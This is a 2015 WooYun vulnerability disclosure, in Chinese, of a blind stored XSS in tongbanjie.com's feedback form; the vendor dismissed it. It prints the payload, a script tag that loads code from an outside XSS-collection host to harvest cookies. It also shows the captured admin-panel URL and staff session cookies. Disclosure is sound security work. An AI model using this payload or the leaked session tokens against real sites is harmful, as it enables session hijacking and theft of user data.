漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0115844
漏洞标题:铜板街xss盲打楼顶
相关厂商:tongbanjie.com
漏洞作者: 腹黑
提交时间:2015-05-25 11:08
修复时间:2015-05-29 13:27
公开时间:2015-05-29 13:27
漏洞类型:xss跨站脚本攻击
危害等级:中
自评Rank:5
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-05-25: 细节已通知厂商并且等待厂商处理中
2015-05-29: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
无聊试了一下结果成功了
详细说明:
在意见反馈处存在xss目测持久性的→_→邮箱快爆了直接爆出后台地址跟cookie
后台地址:http://crm.tongbanjie.com/mobilefeedback
cookie : _uc_id_=_uc_id__961351CB-C0E7-401E-A83A-8E7D1E1A4E1B; ssosessionid=f469a80d9a954c0798324a5efa75f586; [email protected]; JSESSIONID=B6A95E028877C0EF51D86302BF0D29BD; _pzfxuvpc=1430204081670%7C7201317808490756036%7C32%7C1431223400320%7C20%7C1342395322133899591%7C9602842505280255221; _pzfxsfc=; Hm_lvt_c8d0a434f07feb711c8112b02f278082=1430783479,1430796318,1430956099,1431220074; Hm_lpvt_c8d0a434f07feb711c8112b02f278082=1431223403; _ga=GA1.2.163813868.1430204082
漏洞证明:
在意见反馈处存在xss目测持久性的→_→邮箱快爆了直接爆出后台地址跟cookie
测定代码:<script src=http://xxs.la/H46Iai></script>
后台地址:http://crm.tongbanjie.com/mobilefeedback
cookie : _uc_id_=_uc_id__961351CB-C0E7-401E-A83A-8E7D1E1A4E1B; ssosessionid=f469a80d9a954c0798324a5efa75f586; [email protected]; JSESSIONID=B6A95E028877C0EF51D86302BF0D29BD; _pzfxuvpc=1430204081670%7C7201317808490756036%7C32%7C1431223400320%7C20%7C1342395322133899591%7C9602842505280255221; _pzfxsfc=; Hm_lvt_c8d0a434f07feb711c8112b02f278082=1430783479,1430796318,1430956099,1431220074; Hm_lpvt_c8d0a434f07feb711c8112b02f278082=1431223403; _ga=GA1.2.163813868.1430204082
修复方案:
过滤
版权声明:转载请注明来源 腹黑@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-05-29 13:27
厂商回复:
感谢您的报告, 这个BUG以前已经修复, 经过排查目前并没有这个问题.
最新状态:
暂无